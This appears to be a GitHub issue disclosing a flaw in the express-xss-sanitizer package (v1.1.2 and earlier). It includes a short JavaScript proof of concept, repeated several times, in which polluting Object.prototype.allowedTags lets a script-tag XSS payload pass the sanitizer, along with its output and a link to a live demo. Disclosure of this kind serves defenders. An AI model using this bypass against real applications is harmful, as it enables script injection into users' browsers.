Issue: express-xss-sanitizer doesn't sanitize xss payloads properly, when the client is already affected by prototype pollution.
Affected versions: v1.1.2 and earlier
Code -
//Refer https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information
var expressXssSanitizer = require("express-xss-sanitizer");
var data = "<h1>Hi</h1><script>alert()</script>";
Object.prototype.allowedTags = ['script'];
data = expressXssSanitizer.sanitize(data, {});
console.log(data);
Output -
"\n\n⚠️ Your `allowedTags` option includes, `script`, which… option\nand ensure you are accounting for this risk.\n\n"
"Hi<script>alert()</script>"
Issue: express-xss-sanitizer doesn't sanitize xss payloads properly, when the client is already affected by prototype pollution.
Code -
//Refer https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information
var expressXssSanitizer = require("express-xss-sanitizer");
var data = "<h1>Hi</h1><script>alert()</script>";
Object.prototype.allowedTags = ['script'];
data = expressXssSanitizer.sanitize(data, {});
console.log(data);
Output -
"\n\n⚠️ Your `allowedTags` option includes, `script`, which… option\nand ensure you are accounting for this risk.\n\n"
"Hi<script>alert()</script>"
Issue: express-xss-sanitizer doesn't sanitize xss payloads properly, when the client is already affected by prototype pollution.
Affected versions: v1.1.2 and earlier
Code -
Output -
For Live POC - https://runkit.com/embed/w306l6zfm7tu
Refer https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/ for more information.
The text was updated successfully, but these errors were encountered: